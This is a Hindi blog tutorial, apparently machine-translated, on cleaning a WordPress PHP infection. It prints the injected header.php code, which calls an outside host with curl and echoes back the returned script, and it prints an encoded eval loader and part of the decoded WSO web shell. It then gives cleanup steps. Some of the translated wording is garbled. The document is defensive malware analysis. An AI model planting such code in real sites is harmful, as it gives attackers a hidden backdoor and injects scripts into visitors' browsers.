हटाना WordPress PHP वायरस

यह ट्यूटोरियल एक विशेष मामला प्रस्तुत करता है जहां एक ब्लॉग WordPress यह संक्रमित था. निष्कासन WordPress पीएचपी वायरस.

पिछले दिनों मैंने एक संदिग्ध कोड देखा जो PHP वायरस प्रतीत होता है WordPress. निम्नलिखित PHP कोड मौजूद था header.php, पंक्ति से पहले </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

यह कुछ PHP कोड है जो ऐसा लगता है जैसे यह किसी बाहरी सर्वर से किसी संसाधन की सामग्री को पुनः प्राप्त करने का प्रयास कर रहा है, लेकिन URL को संदर्भित करने वाला भाग अधूरा है।

कार्य तंत्र कुछ अधिक जटिल है और ऐसा करता है WordPress PHP वायरस प्रभावित साइटों के आगंतुकों के लिए अदृश्य है। इसके बजाय, यह खोज इंजन (Google) को लक्षित करता है और प्रभावित वेबसाइटों पर आगंतुकों की संख्या में उल्लेखनीय कमी लाता है।

कपि ins

मैलवेयर का विवरण WordPress पीएचपी वायरस

1. उपरोक्त कोड मौजूद है header.php.

2. सर्वर पर एक फ़ाइल दिखाई दी wp-log.php फ़ोल्डर में wp-includes.

3. wp-log.php इसमें एक एन्क्रिप्टेड कोड होता है, लेकिन जिसे डिक्रिप्ट करना अपेक्षाकृत आसान होता है।

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

मैलवेयर कोड को डिक्रिप्ट करें wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

यह एक दुर्भावनापूर्ण PHP स्क्रिप्ट प्रतीत होती है जिसमें सर्वर पर फ़ाइलों और निर्देशिकाओं पर प्रमाणीकरण और कार्यों को संभालने के लिए कोड होता है। यह बहुत आसानी से देखा जा सकता है कि इस स्क्रिप्ट में जैसे वेरिएबल शामिल हैं $auth_pass (प्रमाणीकरण पासवर्ड), $default_action (डिफ़ॉल्ट क्रिया), $default_use_ajax (डिफ़ॉल्ट रूप से Ajax का उपयोग करके) और $default_charset (डिफ़ॉल्ट वर्ण सेटिंग)।

जाहिर है, इस स्क्रिप्ट में एक अनुभाग है जो खोज इंजन जैसे कुछ वेब बॉट्स तक पहुंच को अवरुद्ध करने के लिए HTTP उपयोगकर्ता एजेंटों की जांच करता है। इसमें एक अनुभाग भी है जो PHP सुरक्षा मोड की जाँच करता है और कुछ कार्यशील निर्देशिकाएँ सेट करता है।

4. यदि ब्राउज़र में wp-log.php एक्सेस किया जाता है, तो एक फ़ील्ड के साथ एक वेब पेज दिखाई देता है प्रमाणीकरण. पहली नज़र में यह एक फ़ाइल प्रबंधक प्रतीत होता है जिसके माध्यम से नई फ़ाइलें आसानी से लक्ष्य सर्वर पर अपलोड की जा सकती हैं।

आप किसी वेबसाइट को डिवायरस कैसे करते हैं? WordPress?

हमेशा, मैन्युअल डी-वायरस प्रक्रिया में सबसे पहले यह पता लगाना और समझना शामिल होता है कि भेद्यता क्या थी।

1. संपूर्ण वेबसाइट के लिए बैकअप तैयार करें। इसमें फ़ाइलें और डेटाबेस दोनों शामिल होने चाहिए.

2. लगभग निर्धारित करें कि वायरस कितने समय से आसपास है और अनुमानित समय सीमा के भीतर संशोधित या नव निर्मित फ़ाइलों के लिए वेब सर्वर पर खोज करें।

उदाहरण के लिए, यदि आप फ़ाइलें देखना चाहते हैं .php पिछले सप्ताह में बनाया या संशोधित किया गया, सर्वर में कमांड चलाएँ:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

यह एक सरल विधि है जिसके द्वारा आप फ़ाइलों को उजागर कर सकते हैं WordPress संक्रमित और जिनमें मैलवेयर कोड है।

3. फ़ाइल की जाँच करें .htaccess संदिग्ध निर्देशों का। अनुमति लाइनें या स्क्रिप्ट निष्पादन।

4. डेटाबेस की जाँच करें. यह बहुत संभव है कि कुछ पोस्ट और पेज WordPress मैलवेयर के साथ संपादित किया जा सकता है या नए जोड़े जा सकते हैं की भूमिका वाले उपयोगकर्ता administrator.

5. फ़ोल्डरों और फ़ाइलों के लिए लिखने की अनुमति की जाँच करें। chmod एसआई chown.

अनुशंसित अनुमतियाँ हैं: फ़ाइलों के लिए 644 और निर्देशिकाओं के लिए 755।

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. सभी को अपडेट करें WordPress Plugins / WordPress Themes.

संबंधित: Fix Redirect WordPress Hack 2023 (रीडायरेक्ट वायरस)

ये "बुनियादी" तरीके हैं जिनके द्वारा आप किसी वेबसाइट/ब्लॉग को डीवायरस कर सकते हैं WordPress. यदि आपको कोई समस्या है और सहायता की आवश्यकता है, तो टिप्पणी अनुभाग खुला है।